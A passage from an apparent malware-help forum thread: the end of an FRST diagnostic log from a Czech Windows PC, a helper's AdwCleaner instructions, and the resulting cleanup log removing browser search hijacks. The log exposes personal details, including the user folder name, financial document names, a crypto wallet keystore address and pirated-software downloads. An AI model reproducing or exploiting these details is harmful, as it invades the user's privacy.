ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 005511927 _____ () [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\7zip\SevenZipJBinding-0EsPGE1ZKaCb\lib7-Zip-JBinding.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2021-01-16 17:12 - 2021-01-16 17:12 - 000246784 ____N (Java(TM) Native Access (JNA)) [File not signed] C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\tmp\jna\jna2000625691529400810.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [UDP Query User{E5D79571-6F5B-47A0-BB49-86E0BBEFF6CD}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
FirewallRules: [{ECECF438-162A-4245-9BA1-DB6164C401DB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

03-01-2021 20:48:22 Naplánovaný kontrolní bod
09-01-2021 18:42:24 Removed IQ Option
13-01-2021 21:32:33 Instalační služba modulů systému Windows

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (01/19/2021 07:14:25 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/18/2021 01:04:48 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/17/2021 08:09:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (01/16/2021 07:48:31 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


System errors:
=============

Windows Defender:
===================================
Date: 2021-01-19 15:14:30.5250000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {A810C501-209B-476E-BE78-8D034DF2EACB}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-18 15:14:59.6230000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {C7EDB0A6-0DC9-49BC-98B0-085C324C837E}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-17 15:11:40.7990000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {48B4917E-4551-413D-B6AC-1881372BAB72}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-16 15:44:59.5540000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {D139E753-CCAA-4ECD-95BD-EF51D794489F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2021-01-15 15:11:40.7830000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {BA570A37-FEAE-4F83-AB21-171251D96BE4}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 91%
Total physical RAM: 3767.05 MB
Available physical RAM: 330.68 MB
Total Virtual: 8631.05 MB
Available Virtual: 3342.64 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:60.55 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:229.64 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Re: Please check my log

Posted: 20 Jan 2021 16:33
by Rudy
Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking I agree
right-click the AdwCleaner icon and choose Run as administrator (on Win XP, just launch it with a normal double-click)
click Scan now, then Clean and Repair
after the restart a log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply

Re: Please check my log

Posted: 20 Jan 2021 17:18
by chenny
Here is the log.

# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 9
# Failed: 1


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Not Deleted WebSearch

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

